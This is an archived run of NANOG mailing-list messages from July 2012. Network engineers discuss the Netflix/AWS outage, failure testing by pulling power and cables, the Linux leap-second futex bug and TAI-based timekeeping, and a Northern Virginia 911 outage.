B-rate movies: this was a > > failure to implement and test a reliable system for streaming those > > movies in the face of a power outage at one facility. > > I want to emphasize _and test_. > > Work on an infrastructure which is redundant and designed to provide > "100% uptime" (which is impossible, but that's another story) means > that there should be confidence in a failure being automatically > worked around, detected, and reported. > > I used to work with a guy who had a simple test for these things, > and if I was a VP at Amazon, Netflix, or any other large company I > would do the same. About once a month he would walk out on the > floor of the data center and break something. Pull out an ethernet. > Unplug a server. Flip a breaker. Sounds like something a VP would do. And, actually, it's an important step: make sure the easy failures are covered. But it's really a very small part of resilience. What happens when one instance of a shared service starts performing slowly? What happens when one instance of a redundant database starts timing out queries or returning empty result sets? What happens when the Ethernet interface starts dropping 10% of the packets across it? When happens when the Ethernet switch linecard locks up and stops passing dataplane traffic, but link (physical layer) and/or control plane traffic flows just fine? What happens when the server kernel panics due to bad memeory, reboots, gets all the way up, runs for 30 seconds, kernel panics, lather, rinse, repeat. Reliability is hard. And if you stop looking once you get to the point where you can safely toggle the power switch without causing an impact, you're only a very small part of the way there. -- Brett From dgolding at ragingwire.com Mon Jul 2 15:51:26 2012 From: dgolding at ragingwire.com (Dan Golding) Date: Mon, 2 Jul 2012 13:51:26 -0700 Subject: FYI Netflix is down In-Reply-To: References: <4FEE753C.4030007@thebaughers.com> <8078ED370ADA824281219A7B5BADC39B1D61037C@MBX023-W1-CA-5> <4FEE7671.2060403@thebaughers.com> <4FEE978E.8060300@gmail.com> <4FEEAB1B.7030806@deaddrop.org> Message-ID: <1C7B96053DD7814496A0D1E71661B68302CF5C6A@SMF-ENTXM-001.sac.ragingwire.net> > -----Original Message----- > From: Greg D. Moore [mailto:mooregr at greenms.com] > > > If folks have not read it, I would suggest reading Normal Accidents by > Charles Perrow. > Also, Human Error by James Reason. From george.herbert at gmail.com Mon Jul 2 16:04:08 2012 From: george.herbert at gmail.com (George Herbert) Date: Mon, 2 Jul 2012 14:04:08 -0700 Subject: FYI Netflix is down In-Reply-To: References: <4FEE753C.4030007@thebaughers.com> <8078ED370ADA824281219A7B5BADC39B1D61037C@MBX023-W1-CA-5> <4FEE7671.2060403@thebaughers.com> <4FEE978E.8060300@gmail.com> <4FEEAB1B.7030806@deaddrop.org> Message-ID: On Mon, Jul 2, 2012 at 12:43 PM, Greg D. Moore wrote: > At 03:08 PM 7/2/2012, George Herbert wrote: > > If folks have not read it, I would suggest reading Normal Accidents by > Charles Perrow. > > The "it can't happen" is almost guaranteed to happen. ;-) ?And when it does, > it'll often interact in ways we can't predict or sometimes even understand. Seconded. There are also aerospace and nuclear and failure analysis books which are good, but I often encourage people to start with that one. > As for pulling the plug to test stuff. I recall a demo at Netapps in the > early 00's. ?They were talking about their fault tolerance and how great it > was. ?So I walked up to their demo array and said, "So, it shouldn't be a > problem if I pulled this drive right here?" ?Before I could the salesperson > or tech guy, can't remember, ?told me to stop. ?He didn't want to risk it. > > That right there said loads about their confidence in their own system. I worked for a Sun clone vendor (Axil) for a while and took some of our systems and storage to Comdex one year in the 90s. We had a RAID unit (Mylex controller) we had just introduced. Beforehand, I made REALLY REALLY SURE that the pull-the-disk and pull-the-redundant-power tricks worked. And showed them to people with the "Please keep in mind that this voids the warranty, but here we *rip* go...". All of the other server vendors were giving me dirty looks for that one. Apparently I sold a few systems that way. You have to watch for connector wear-out and things like that, but ... All the clusters I've built, I've insisted on a burn-in time plug pull test on all the major components. We caught things with those from time to time. Especially with N+1, if it is really N+0 due to a bug or flaw you need to know that... -- -george william herbert george.herbert at gmail.com From mooregr at greenms.com Mon Jul 2 16:15:10 2012 From: mooregr at greenms.com (Greg D. Moore) Date: Mon, 02 Jul 2012 17:15:10 -0400 Subject: FYI Netflix is down In-Reply-To: References: <4FEE753C.4030007@thebaughers.com> <8078ED370ADA824281219A7B5BADC39B1D61037C@MBX023-W1-CA-5> <4FEE7671.2060403@thebaughers.com> <4FEE978E.8060300@gmail.com> <4FEEAB1B.7030806@deaddrop.org> Message-ID: At 05:04 PM 7/2/2012, George Herbert wrote: >On Mon, Jul 2, 2012 at 12:43 PM, Greg D. Moore wrote: > > At 03:08 PM 7/2/2012, George Herbert wrote: > > > > If folks have not read it, I would suggest reading Normal Accidents by > > Charles Perrow. > > > > The "it can't happen" is almost guaranteed to happen. ;-) And > when it does, > > it'll often interact in ways we can't predict or sometimes even understand. > >Seconded. I figured you had probably read it. :-) >There are also aerospace and nuclear and failure analysis books which >are good, but I often encourage people to start with that one. > > > As for pulling the plug to test stuff. I recall a demo at Netapps in the > > early 00's. They were talking about their fault tolerance and how great it > > was. So I walked up to their demo array and said, "So, it shouldn't be a > > problem if I pulled this drive right here?" Before I could the salesperson > > or tech guy, can't remember, told me to stop. He didn't want to risk it. > > > > That right there said loads about their confidence in their own system. > >I worked for a Sun clone vendor (Axil) for a while and took some of >our systems and storage to Comdex one year in the 90s. We had a RAID >unit (Mylex controller) we had just introduced. Beforehand, I made >REALLY REALLY SURE that the pull-the-disk and pull-the-redundant-power >tricks worked. And showed them to people with the "Please keep in >mind that this voids the warranty, but here we *rip* go...". All of >the other server vendors were giving me dirty looks for that one. >Apparently I sold a few systems that way. I can imagine. Back when we were testing a cluster from MicronPC, the techs were in our office and they encouraged us to do that. It was re-assuring. >You have to watch for connector wear-out and things like that, but ... > >All the clusters I've built, I've insisted on a burn-in time plug pull >test on all the major components. We caught things with those from >time to time. Especially with N+1, if it is really N+0 due to a bug >or flaw you need to know that... About 7 years back, we were about to move a production platform to a cluster+SAN that an outside vendor had installed. I was brought in at the last minute to lead the project. Before we did the move, I said, "Umm, has anyone tried a remote reboot of the servers?" "Oh they rebooted fine when we were at the datacenter with the vendor. We're good." I repeated my question and finally did the old, "Ok, I know I'm being a pain, but please, let's just try it once, remotely before we're committed." So we rebooted, and wait, and waited, and waited. It took a trip out to the datacenter (we couldn't afford good remote KVM tools back then) to see that the server was trying to mount stuff off of something on the network. At first we couldn't figure out what it was. Finally realized it was looking for files on the vendor's laptop. So of course it had worked fine when the vendor was at the datacenter. Despite all that, the vendor still denied it being their problem. Anyway, enough reminiscing. Things happen. We can only do so much to prevent them, and never assume. >-- >-george william herbert >george.herbert at gmail.com Greg D. Moore http://greenmountainsoftware.wordpress.com/ CEO QuiCR: Quick, Crowdsourced Responses. http://www.quicr.net From smb at cs.columbia.edu Mon Jul 2 17:34:08 2012 From: smb at cs.columbia.edu (Steven Bellovin) Date: Mon, 2 Jul 2012 18:34:08 -0400 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <4FF1C291.80307@armoredpackets.com> References: <4FEFB944.2010006@paulgraydon.co.uk> <596B74B410EE6B4CA8A30C3AF1A155EA09DF80D3@RWC-MBX1.corp.seven.com> <596B74B410EE6B4CA8A30C3AF1A155EA09DF8311@RWC-MBX1.corp.seven.com> <4FEFD4F5.5090306@derekivey.com> <4FEFDA14.7070403@gmail.com> <596B74B410EE6B4CA8A30C3AF1A155EA09E069E0@RWC-MBX1.corp.seven.com> <4FF1C291.80307@armoredpackets.com> Message-ID: On Jul 2, 2012, at 11:47 AM, AP NANOG wrote: > Do you happen to know all the kernels and versions affected by this? > > See http://landslidecoding.blogspot.com/2012/07/linuxs-leap-second-deadlocks.html --Steve Bellovin, https://www.cs.columbia.edu/~smb From smb at cs.columbia.edu Mon Jul 2 17:39:50 2012 From: smb at cs.columbia.edu (Steven Bellovin) Date: Mon, 2 Jul 2012 18:39:50 -0400 Subject: FYI Netflix is down In-Reply-To: References: <4FEE753C.4030007@thebaughers.com> <8078ED370ADA824281219A7B5BADC39B1D61037C@MBX023-W1-CA-5> <4FEE7671.2060403@thebaughers.com> <4FEE978E.8060300@gmail.com> <4FEEAB1B.7030806@deaddrop.org> Message-ID: On Jul 2, 2012, at 3:43 PM, Greg D. Moore wrote: > At 03:08 PM 7/2/2012, George Herbert wrote: > > If folks have not read it, I would suggest reading Normal Accidents by Charles Perrow. Strong second to that suggestion. --Steve Bellovin, https://www.cs.columbia.edu/~smb From egon at egon.cc Mon Jul 2 18:03:58 2012 From: egon at egon.cc (James Downs) Date: Mon, 2 Jul 2012 16:03:58 -0700 Subject: FYI Netflix is down In-Reply-To: References: <4FEF4394.2030108@rollernet.us> <1C7B96053DD7814496A0D1E71661B68302CF5B79@SMF-ENTXM-001.sac.ragingwire.net> <20120702160909.GA65216@ussenterprise.ufp.org> <20120702161746.GA65753@ussenterprise.ufp.org> <20120702175300.GA69672@ussenterprise.ufp.org> <4FF1EFAD.6000204@paulgraydon.co.uk> Message-ID: <92F55DE9-EBFF-48D3-B823-5A529A6CF34D@egon.cc> On Jul 2, 2012, at 1:20 PM, david raistrick wrote: > Amazon resources are controlled (from a consumer viewpoint) by API - that API is also used by amazon's internal toolkits that support ELB (and RDS..). Those (http accessed) API interfaces were unavailable for a good portion of the outages. Right, and other toolkits like boto. Each AZ has a different endpoint (url), and as I have no resources running in East, I saw no problems with the API endpoints I use. So, as you note, US-EAST Region was "not controllable". > I know nothing of the netflix side of it - but that's what -we- saw. (and that caused all us-east RDS instances in every AZ to appear And, if you lose US-EAST, you need to run *somewhere*. Netflix did not cutover www.netflix.com to another Region. Why not is another question. -j From mysidia at gmail.com Mon Jul 2 19:46:42 2012 From: mysidia at gmail.com (Jimmy Hess) Date: Mon, 2 Jul 2012 19:46:42 -0500 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: References: <4FEFB944.2010006@paulgraydon.co.uk> <596B74B410EE6B4CA8A30C3AF1A155EA09DF80D3@RWC-MBX1.corp.seven.com> <596B74B410EE6B4CA8A30C3AF1A155EA09DF8311@RWC-MBX1.corp.seven.com> <4FEFD4F5.5090306@derekivey.com> <4FEFDA14.7070403@gmail.com> <596B74B410EE6B4CA8A30C3AF1A155EA09E069E0@RWC-MBX1.corp.seven.com> <4FF1C291.80307@armoredpackets.com> Message-ID: On 7/2/12, Steven Bellovin wrote: > On Jul 2, 2012, at 11:47 AM, AP NANOG wrote: >> Do you happen to know all the kernels and versions affected by this? > See > http://landslidecoding.blogspot.com/2012/07/linuxs-leap-second-deadlocks.html > --Steve Bellovin, https://www.cs.columbia.edu/~smb Someone should write a dastardly system clock daemon to cause the insertion of frequent spurious positive leap seconds, followed by the spurious insertion of negative leap seconds. For testing purposes... any application which crashes under such a test, should be repaired or not used in any critical capacity -- -JH From joly at punkcast.com Mon Jul 2 19:52:08 2012 From: joly at punkcast.com (Joly MacFie) Date: Mon, 2 Jul 2012 20:52:08 -0400 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: References: <4FEFB944.2010006@paulgraydon.co.uk> <596B74B410EE6B4CA8A30C3AF1A155EA09DF80D3@RWC-MBX1.corp.seven.com> <596B74B410EE6B4CA8A30C3AF1A155EA09DF8311@RWC-MBX1.corp.seven.com> <4FEFD4F5.5090306@derekivey.com> <4FEFDA14.7070403@gmail.com> <596B74B410EE6B4CA8A30C3AF1A155EA09E069E0@RWC-MBX1.corp.seven.com> <4FF1C291.80307@armoredpackets.com> Message-ID: On Mon, Jul 2, 2012 at 8:46 PM, Jimmy Hess wrote: > > Someone should write a dastardly system clock daemon to cause the > insertion of frequent spurious positive leap seconds, followed by the > spurious insertion of negative leap seconds. > > Chaos time bandit? -- --------------------------------------------------------------- Joly MacFie 218 565 9365 Skype:punkcast WWWhatsup NYC - http://wwwhatsup.com http://pinstand.com - http://punkcast.com VP (Admin) - ISOC-NY - http://isoc-ny.org -------------------------------------------------------------- - From rodrick.brown at gmail.com Mon Jul 2 21:19:18 2012 From: rodrick.brown at gmail.com (Rodrick Brown) Date: Mon, 2 Jul 2012 22:19:18 -0400 Subject: FYI Netflix is down In-Reply-To: <92F55DE9-EBFF-48D3-B823-5A529A6CF34D@egon.cc> References: <4FEF4394.2030108@rollernet.us> <1C7B96053DD7814496A0D1E71661B68302CF5B79@SMF-ENTXM-001.sac.ragingwire.net> <20120702160909.GA65216@ussenterprise.ufp.org> <20120702161746.GA65753@ussenterprise.ufp.org> <20120702175300.GA69672@ussenterprise.ufp.org> <4FF1EFAD.6000204@paulgraydon.co.uk> <92F55DE9-EBFF-48D3-B823-5A529A6CF34D@egon.cc> Message-ID: On Jul 2, 2012, at 7:03 PM, James Downs wrote: > > On Jul 2, 2012, at 1:20 PM, david raistrick wrote: > >> Amazon resources are controlled (from a consumer viewpoint) by API - that API is also used by amazon's internal toolkits that support ELB (and RDS..). Those (http accessed) API interfaces were unavailable for a good portion of the outages. > > Right, and other toolkits like boto. Each AZ has a different endpoint (url), and as I have no resources running in East, I saw no problems with the API endpoints I use. So, as you note, US-EAST Region was "not controllable". > >> I know nothing of the netflix side of it - but that's what -we- saw. (and that caused all us-east RDS instances in every AZ to appear > > > And, if you lose US-EAST, you need to run *somewhere*. Netflix did not cutover www.netflix.com to another Region. Why not is another question. At which point are you guys going to realize that no matter how much resiliency, redundancy and fault tolerance you plan into an infrastructure there are always the unforeseen that just doesn't make any sense to plan for. Four major decision factors are cost, complexity, time and failure rate. At some point a business need to focus on its core business. IT like any other business resource has to be managed efficiently and its sole purpose is for the enablement of said business nothing more. Some of the post here are highly laughable and so unrealistic. People are acting as if Netflix is part of some critical service they stream movies for Christ sake. Some acceptable level of loss is fine for 99.99% of Netflix's user base just like cable, electricity and running water I suffer a few hours of losses each year from those services it suck yes, is it the end of the world no.. This horse is dead! > From sean at donelan.com Mon Jul 2 21:27:39 2012 From: sean at donelan.com (Sean Donelan) Date: Mon, 2 Jul 2012 22:27:39 -0400 (EDT) Subject: Northern Virginia 9-1-1 service after storm Message-ID: Probably not as interesting as talking about Amazon/Netflix. http://www.washingtonpost.com/local/after-storm-911-phone-service-remains-spotty/2012/07/02/gJQA33dHJW_story.html Fairfax County's 911 emergency center operated at just half capacity Monday as Verizon struggled to figure out why both its primary and backup power systems failed after Friday night's storm and left much of Northern Virginia without 911 service through the weekend. From egon at egon.cc Mon Jul 2 21:57:04 2012 From: egon at egon.cc (James Downs) Date: Mon, 2 Jul 2012 19:57:04 -0700 Subject: FYI Netflix is down In-Reply-To: References: <4FEF4394.2030108@rollernet.us> <1C7B96053DD7814496A0D1E71661B68302CF5B79@SMF-ENTXM-001.sac.ragingwire.net> <20120702160909.GA65216@ussenterprise.ufp.org> <20120702161746.GA65753@ussenterprise.ufp.org> <20120702175300.GA69672@ussenterprise.ufp.org> <4FF1EFAD.6000204@paulgraydon.co.uk> <92F55DE9-EBFF-48D3-B823-5A529A6CF34D@egon.cc> Message-ID: <7CEE65E1-A4D6-44B3-8686-4222F436D9A6@egon.cc> On Jul 2, 2012, at 7:19 PM, Rodrick Brown wrote: > People are acting as if Netflix is part of some critical service they stream movies for Christ sake. Some acceptable level of loss is fine for 99.99% of Netflix's user base just like cable, electricity and running water I suffer a few hours of losses each year from those services it suck yes, is it the end of the world no.. You missed the point. From itsmemattchung at gmail.com Mon Jul 2 22:28:05 2012 From: itsmemattchung at gmail.com (Matt Chung) Date: Mon, 2 Jul 2012 22:28:05 -0500 Subject: Contributing to the community Message-ID: I've been so fortunate and appreciative over the years to have colleagues (many whom I consider my close friends) cultivate my career by providing sound advise that I will continue to pass on. In addition to those I've known personally, I have gleaned a substantial amount of information through many of you who've contributed to these threads, blogs, and so on. Within the organizations I've worked for, I have always been an advocate for sharing knowledge in order for the company to grow collectively; I truly believe its infectious. But I digress... At my previous company (regional WISP) as a network engineer, I was able to get buy in from the partners to conduct training for our call center in effort to better support our customers. By institutionalizing a methodical approach to troubleshooting (and performing root cause analysis), we can filter out many potential issues (i.e why check if there is network connectivity if you are getting an HTTP response - ruled out the lower stack). That was great however...despite contributing to my organization, I've always felt that I haven't performed due diligence when it comes to contributing back to the network/IT community as an entity. Excuses have been made ("I don't have time") on my part and I realized that everyone here is a working professional as well. I've never been an active participant like many of you. As a person who is passionate about this field (as well as a working professional), how do you find the time in order to contribute? Do you ever feel that the post may be redundant? Another factor I've always took into consideration was the fact that although I may be knowledgeable and proficient in one facet, someone out there is the true expert (i.e assisted in developing the RFC) and has a deeper understanding than I do (which I feel my contribution may be inadequate). -- -Matt Chung From hmurray at megapathdsl.net Mon Jul 2 23:24:29 2012 From: hmurray at megapathdsl.net (Hal Murray) Date: Mon, 02 Jul 2012 21:24:29 -0700 Subject: FYI Netflix is down Message-ID: <20120703042429.17434800039@ip-64-139-1-69.sjc.megapath.net> George Herbert said: > I worked for a Sun clone vendor (Axil) for a while and took some of our > systems and storage to Comdex one year in the 90s. We had a RAID unit > (Mylex controller) we had just introduced. Beforehand, I made REALLY REALLY > SURE that the pull-the-disk and pull-the-redundant-power tricks worked. And > showed them to people with the "Please keep in mind that this voids the > warranty, but here we *rip* go...". All of the other server vendors were > giving me dirty looks for that one. Apparently I sold a few systems that > way. :) Nice. Thanks. Many years ago, I worked for one of DEC's research groups. We built a network using FDDI 4B/5B link technology based on AMD TAXI chips. (They were state of the art back then.) The switches were 3U(?) boxes with 12 ports. It took a rack of 6 or 8 of them in the phone closet to cover a floor. Workstations had 2 cables plugged into different switches. In theory, we covered any single point of failure. My office was near the phone closet. I got to watch my boss give demos to visiting VIPs. He was pretty good at it. In the middle of explaining things, he would grab a power cord and yank it. Blinka-blinka=blinka and the remaining switches would reconfigure and go back to work. (It took under a second.) It was interesting to watch the VIPs. Most of them got it: the network really could recover quickly. The interesting ones had a telco background. They were really surprised. The concept of disrupting live traffic for something as insignificant as a demo was off scale in their culture. It was just a research lab. We were used to eating our own dog food. ---------- "Greg D. Moore" said: > If folks have not read it, I would suggest reading Normal Accidents by > Charles Perrow. +1 > The "it can't happen" is almost guaranteed to happen. ;-) And when it > does, it'll often interact in ways we can't predict or sometimes even > understand. My memory of that sort of event is roughly... (see above for context) The hardware broke and turned a vanilla packet into a super-long packet. My FPGA code was supposed to catch that case and do something sane. It was never tested and didn't work. It poured crap all over memory. Needless to say, things went downhill from there. Easy to spot in hindsight. None of us thought that was an interesting case while we were testing. -- These are my opinions. I hate spam. From george.herbert at gmail.com Tue Jul 3 01:06:33 2012 From: george.herbert at gmail.com (George Herbert) Date: Mon, 2 Jul 2012 23:06:33 -0700 Subject: FYI Netflix is down In-Reply-To: References: <4FEF4394.2030108@rollernet.us> <1C7B96053DD7814496A0D1E71661B68302CF5B79@SMF-ENTXM-001.sac.ragingwire.net> <20120702160909.GA65216@ussenterprise.ufp.org> <20120702161746.GA65753@ussenterprise.ufp.org> <20120702175300.GA69672@ussenterprise.ufp.org> <4FF1EFAD.6000204@paulgraydon.co.uk> <92F55DE9-EBFF-48D3-B823-5A529A6CF34D@egon.cc> Message-ID: <19823192-9E77-48B2-9E27-64886FC938C2@gmail.com> On Jul 2, 2012, at 7:19 PM, Rodrick Brown wrote: > People are acting as if Netflix is part of some critical service they stream movies for Christ sake. Some acceptable level of loss is fine for 99.99% of Netflix's user base just like cable, electricity and running water I suffer a few hours of losses each year from those services it suck yes, is it the end of the world no.. Actually calculating - understanding - cost of downtime, and what variations on that exist over time, are keys to reliability engineering. But if you plan to cover X failure scenarios and only cover X/2 failure scenarios due to implementation glitches you goofed. The right answer may be "relax and accept the downtime" and it may be "spend $10 million dollars to avoid most of these". If you haven't thought it through and quantified, do so... George William Herbert Sent from my iPhone From mpalmer at hezmatt.org Tue Jul 3 02:27:14 2012 From: mpalmer at hezmatt.org (Matthew Palmer) Date: Tue, 3 Jul 2012 17:27:14 +1000 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <4FF1C8B6.6010503@mtcc.com> References: <23616229.12018.1341245044739.JavaMail.root@benjamin.baylink.com> <4FF1C8B6.6010503@mtcc.com> Message-ID: <20120703072714.GG2221@hezmatt.org> On Mon, Jul 02, 2012 at 09:13:42AM -0700, Michael Thomas wrote: > My centos 6/64 running 3.0 seemed to weather it too. I'm not quite > clear on what I should be looking for to classify it as being "broken" though. The problems I saw were related to programs that use futex(2) (Java, MySQL, Chromium, in my personal experience) chewing up lots of CPU because the futex system call wasn't quite doing what it was supposed to be doing (waking up threads when they were OK to proceed) and instead constantly waking the threads up, having the threads go "OK, so my lock is clear and I'm ready to go?", the kernel saying "oh, no, sorry" and the thread going back to sleep again -- only to be woken up again immediately. Sort of an object lesson in why busy-wait locks suck. - Matt -- The main advantages of Haynes and Chilton manuals are that they cost $15, where the factory manuals cost $100 and up, and that they will tell you how to use two hammers, a block of wood, and a meerkat to replace "special tool no. 2-112-A" -- Matt Roberds in asr. From bdha at mirrorshades.net Tue Jul 3 03:41:21 2012 From: bdha at mirrorshades.net (Bryan Horstmann-Allen) Date: Tue, 3 Jul 2012 04:41:21 -0400 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <20120703072714.GG2221@hezmatt.org> References: <23616229.12018.1341245044739.JavaMail.root@benjamin.baylink.com> <4FF1C8B6.6010503@mtcc.com> <20120703072714.GG2221@hezmatt.org> Message-ID: <20120703084121.GA13597@lab.pobox.com> +------------------------------------------------------------------------------ | On 2012-07-03 17:27:14, Matthew Palmer wrote: | | The problems I saw were related to programs that use futex(2) (Java, MySQL, | Chromium, in my personal experience) chewing up lots of CPU because the | futex system call wasn't quite doing what it was supposed to be doing | (waking up threads when they were OK to proceed) and instead constantly | waking the threads up, having the threads go "OK, so my lock is clear and | I'm ready to go?", the kernel saying "oh, no, sorry" and the thread going | back to sleep again -- only to be woken up again immediately. Sort of an | object lesson in why busy-wait locks suck. A good dig into the problem, and previous problems with that code: http://landslidecoding.blogspot.com/2012/07/linuxs-leap-second-deadlocks.html Cheers. -- bdha cyberpunk is dead. long live cyberpunk. From wolfgang.rupprecht at gmail.com Tue Jul 3 03:54:12 2012 From: wolfgang.rupprecht at gmail.com (Wolfgang S. Rupprecht) Date: Tue, 03 Jul 2012 01:54:12 -0700 Subject: F-ckin Leap Seconds, how do they work? References: <4FEFB944.2010006@paulgraydon.co.uk> <596B74B410EE6B4CA8A30C3AF1A155EA09DF80D3@RWC-MBX1.corp.seven.com> <596B74B410EE6B4CA8A30C3AF1A155EA09DF8311@RWC-MBX1.corp.seven.com> <4FEFD4F5.5090306@derekivey.com> <4FEFDA14.7070403@gmail.com> <596B74B410EE6B4CA8A30C3AF1A155EA09E069E0@RWC-MBX1.corp.seven.com> <4FF1C291.80307@armoredpackets.com> Message-ID: <878vf1i5sb.fsf@arbol.wsrcc.com> Steven Bellovin writes: > See > http://landslidecoding.blogspot.com/2012/07/linuxs-leap-second-deadlocks.html Maybe we should stop wrenching the poor system time back and forth. We no longer add or subtract daylight savings time (or timezones) to the kernel time, why do we do it with leapseconds? We should really move the leapseconds correction into the display routines like DST and timezones already are. I believe the Olson time code already has ifdefs for doing this. I wonder why the system's internal time isn't run that way. -wolfgang -- g+: https://plus.google.com/114566345864337108516/about From owen at delong.com Tue Jul 3 04:03:10 2012 From: owen at delong.com (Owen DeLong) Date: Tue, 3 Jul 2012 02:03:10 -0700 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <878vf1i5sb.fsf@arbol.wsrcc.com> References: <4FEFB944.2010006@paulgraydon.co.uk> <596B74B410EE6B4CA8A30C3AF1A155EA09DF80D3@RWC-MBX1.corp.seven.com> <596B74B410EE6B4CA8A30C3AF1A155EA09DF8311@RWC-MBX1.corp.seven.com> <4FEFD4F5.5090306@derekivey.com> <4FEFDA14.7070403@gmail.com> <596B74B410EE6B4CA8A30C3AF1A155EA09E069E0@RWC-MBX1.corp.seven.com> <4FF1C291.80307@armoredpackets.com> <878vf1i5sb.fsf@arbol.wsrcc.com> Message-ID: <779D9856-CAC8-478E-BB7F-96913F8E6D6D@delong.com> DST is a time-zone specific phenomenon. Leap seconds are changes to the actual core time. UTC moves with leap seconds. It doesn't move with DST or other timezone weirdnesses. The system clock needs to be UTC, not UTC ? some offset stuck somewhere that keeps some form of running tally of the current leap second offset since the epoch. Owen On Jul 3, 2012, at 1:54 AM, Wolfgang S. Rupprecht wrote: > > Steven Bellovin writes: >> See >> http://landslidecoding.blogspot.com/2012/07/linuxs-leap-second-deadlocks.html > > Maybe we should stop wrenching the poor system time back and forth. We > no longer add or subtract daylight savings time (or timezones) to the > kernel time, why do we do it with leapseconds? We should really move > the leapseconds correction into the display routines like DST and > timezones already are. I believe the Olson time code already has ifdefs > for doing this. I wonder why the system's internal time isn't run that > way. > > -wolfgang > -- > g+: https://plus.google.com/114566345864337108516/about > From saku at ytti.fi Tue Jul 3 04:31:03 2012 From: saku at ytti.fi (Saku Ytti) Date: Tue, 3 Jul 2012 12:31:03 +0300 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <878vf1i5sb.fsf@arbol.wsrcc.com> References: <4FEFB944.2010006@paulgraydon.co.uk> <596B74B410EE6B4CA8A30C3AF1A155EA09DF80D3@RWC-MBX1.corp.seven.com> <596B74B410EE6B4CA8A30C3AF1A155EA09DF8311@RWC-MBX1.corp.seven.com> <4FEFD4F5.5090306@derekivey.com> <4FEFDA14.7070403@gmail.com> <596B74B410EE6B4CA8A30C3AF1A155EA09E069E0@RWC-MBX1.corp.seven.com> <4FF1C291.80307@armoredpackets.com> <878vf1i5sb.fsf@arbol.wsrcc.com> Message-ID: <20120703093103.GA9947@pob.ytti.fi> On (2012-07-03 01:54 -0700), Wolfgang S. Rupprecht wrote: > kernel time, why do we do it with leapseconds? We should really move > the leapseconds correction into the display routines like DST and Yes. TAI time natively and presentation uses leap lookup tables to convert to UTC. Unixtime is not monotonously increasing which is incredibly broken by design. http://en.wikipedia.org/wiki/Unixtime#TAI-based_variant http://cr.yp.to/libtai.html -- ++ytti From dot at dotat.at Tue Jul 3 06:02:58 2012 From: dot at dotat.at (Tony Finch) Date: Tue, 3 Jul 2012 12:02:58 +0100 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: References: <4FEFB944.2010006@paulgraydon.co.uk> <596B74B410EE6B4CA8A30C3AF1A155EA09DF80D3@RWC-MBX1.corp.seven.com> <596B74B410EE6B4CA8A30C3AF1A155EA09DF8311@RWC-MBX1.corp.seven.com> <4FEFD4F5.5090306@derekivey.com> <4FEFDA14.7070403@gmail.com> <596B74B410EE6B4CA8A30C3AF1A155EA09E069E0@RWC-MBX1.corp.seven.com> <4FF1C291.80307@armoredpackets.com> Message-ID: Jimmy Hess wrote: > > Someone should write a dastardly system clock daemon to cause the > insertion of frequent spurious positive leap seconds, followed by the > spurious insertion of negative leap seconds. > > For testing purposes... any application which crashes under such a > test, should be repaired or not used in any critical capacity For testing applications you can try libfaketime. Testing systems is a bit harder... https://github.com/wolfcw/libfaketime Tony. -- f.anthony.n.finch http://dotat.at/ FitzRoy, Sole: West or southwest 4 or 5, occasionally 6. Moderate or rough. Occasional rain or drizzle, fog patches. Moderate or good, occasionally very poor. From dot at dotat.at Tue Jul 3 06:06:15 2012 From: dot at dotat.at (Tony Finch) Date: Tue, 3 Jul 2012 12:06:15 +0100 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <878vf1i5sb.fsf@arbol.wsrcc.com> References: <4FEFB944.2010006@paulgraydon.co.uk> <596B74B410EE6B4CA8A30C3AF1A155EA09DF80D3@RWC-MBX1.corp.seven.com> <596B74B410EE6B4CA8A30C3AF1A155EA09DF8311@RWC-MBX1.corp.seven.com> <4FEFD4F5.5090306@derekivey.com> <4FEFDA14.7070403@gmail.com> <596B74B410EE6B4CA8A30C3AF1A155EA09E069E0@RWC-MBX1.corp.seven.com> <4FF1C291.80307@armoredpackets.com> <878vf1i5sb.fsf@arbol.wsrcc.com> Message-ID: Wolfgang S. Rupprecht wrote: > I wonder why the system's internal time isn't run that way. For compatibility with software that does time calculations without using the crappy libc time API. Tony. -- f.anthony.n.finch http://dotat.at/ Humber, Thames, Dover, Wight: South 4 or 5. Slight or moderate. Occasional rain or drizzle, fog patches. Moderate, occasionally very poor. From dgolding at ragingwire.com Tue Jul 3 08:11:11 2012 From: dgolding at ragingwire.com (Dan Golding) Date: Tue, 3 Jul 2012 06:11:11 -0700 Subject: FYI Netflix is down In-Reply-To: <7CEE65E1-A4D6-44B3-8686-4222F436D9A6@egon.cc> References: <4FEF4394.2030108@rollernet.us> <1C7B96053DD7814496A0D1E71661B68302CF5B79@SMF-ENTXM-001.sac.ragingwire.net> <20120702160909.GA65216@ussenterprise.ufp.org> <20120702161746.GA65753@ussenterprise.ufp.org> <20120702175300.GA69672@ussenterprise.ufp.org> <4FF1EFAD.6000204@paulgraydon.co.uk> <92F55DE9-EBFF-48D3-B823-5A529A6CF34D@egon.cc> <7CEE65E1-A4D6-44B3-8686-4222F436D9A6@egon.cc> Message-ID: <1C7B96053DD7814496A0D1E71661B68302CF5CEA@SMF-ENTXM-001.sac.ragingwire.net> > -----Original Message----- > From: James Downs [mailto:egon at egon.cc] > > > On Jul 2, 2012, at 7:19 PM, Rodrick Brown wrote: > > > People are acting as if Netflix is part of some critical service they > stream movies for Christ sake. Some acceptable level of loss is fine > for 99.99% of Netflix's user base just like cable, electricity and > running water I suffer a few hours of losses each year from those > services it suck yes, is it the end of the world no.. > > You missed the point. And very publically missed the point, too. The Netflix issues led to a large discussion of downtime, testing, and fault tolerance that has been very useful for the community and could lead to some good content for NANOG conferences (/pokes PC). For Netflix (and all other similar services) downtime is money and money is downtime. There is a quantifiable cost for customer acquisition and a quantifiable churn during each minute of downtime. Mature organizations actually calculate and track this. The trick is to ensure that you have balanced the cost of greater redundancy vs the cost of churn/customer acquisition. If you are spending too much on redundancy, it's as big of mistake as spending too little. Also, I don't think there is an acceptable level of downtime for water. Neither do water utilities. - Dan From joelja at bogus.com Tue Jul 3 09:02:33 2012 From: joelja at bogus.com (Joel jaeggli) Date: Tue, 03 Jul 2012 07:02:33 -0700 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <878vf1i5sb.fsf@arbol.wsrcc.com> References: <4FEFB944.2010006@paulgraydon.co.uk> <596B74B410EE6B4CA8A30C3AF1A155EA09DF80D3@RWC-MBX1.corp.seven.com> 